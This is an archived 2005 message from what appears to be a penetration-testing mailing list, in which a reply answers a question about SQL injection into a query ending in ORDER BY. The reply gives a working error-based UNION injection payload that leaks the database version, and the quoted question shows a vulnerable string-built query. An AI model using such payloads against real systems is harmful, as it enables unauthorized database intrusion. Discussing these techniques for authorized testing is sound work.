Re: sql injection with order by

From: Chitresh Sen (chitresh_sen_at_ftml.net)
Date: 04/11/05

Next message: Franck Veysset: "Re: Rogue AP Wireless on Windows/Linux"

Previous message: Steve A: "RE: Rogue AP Wireless on Windows/Linux"
In reply to: dietf dietf: "sql injection with order by"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "dietf dietf" <dietf@yahoo.com>, pen-test@securityfocus.com
Date: Sun, 10 Apr 2005 18:57:17 -0700

Try This

' union select convert(int, @@version), 1, 1, 1 --

On 8 Apr 2005 03:52:02 -0000, "dietf dietf" <dietf@yahoo.com> said:
>
>
> Hi all,
> I am trying to make an injection with the statement below,
>
> SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
> CusID='%Customer%' ORDER BY Sira, ProjeTurID"
>
> in the statement above I inject ")select @@version-- for the variable
> Customer. But unless I have ended inject code with -- nothing happens.
> I get
> SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
> FirmaID=")select @@version-- ORDER BY Sira, ProjeTurID"
> what is the problem? can anybody tell me?
> Is the problem occurs from the word ORDER BY?
> Thanks

-- 
  Chitresh Sen
  chitresh_sen@ftml.net

Next message: Franck Veysset: "Re: Rogue AP Wireless on Windows/Linux"

Previous message: Steve A: "RE: Rogue AP Wireless on Windows/Linux"
In reply to: dietf dietf: "sql injection with order by"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]